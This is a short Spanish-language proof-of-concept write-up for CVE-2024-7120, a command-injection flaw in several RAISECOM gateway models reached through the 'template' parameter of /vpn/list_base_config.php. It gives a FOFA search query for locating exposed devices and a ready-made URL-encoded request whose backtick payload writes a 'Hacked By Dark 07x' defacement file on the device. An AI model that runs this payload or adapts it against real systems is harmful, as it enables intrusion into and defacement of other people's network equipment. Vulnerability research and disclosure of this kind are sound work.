
Prueba de concepto de exploit para CVE-2024-7120, inyección de comandos en dispositivos RAISECOM Gateway. Ejecuta comandos arbitrarios a través del parámetro template en list_base_config.php.
Se ha identificado una vulnerabilidad de inyección de comandos en los dispositivos Gateway RAISECOM, afectando a los modelos MSG1200, MSG2100E, MSG2200 y MSG2300. Esta vulnerabilidad permite a atacantes remotos ejecutar comandos arbitrarios en el sistema a través de la interfaz web. El problema reside en el script list_base_config.php, específicamente a través del parámetro template, afectando a más de 25,112 dispositivos en Internet.
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"
URI: /vpn/list_base_config.php
Descripción: list_base_config.php es un componente de interfaz web de los dispositivos Gateway RAISECOM utilizado para gestionar configuraciones VPN. La vulnerabilidad identificada surge debido al manejo incorrecto del parámetro template en este script. Este parámetro puede ser explotado para ejecutar comandos arbitrarios en el sistema operativo del dispositivo debido a una sanitización insuficiente de las entradas.
CWE-77: Inyección de Comandos
Aquí hay un ejemplo de cómo se puede explotar la vulnerabilidad usando un comando curl:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"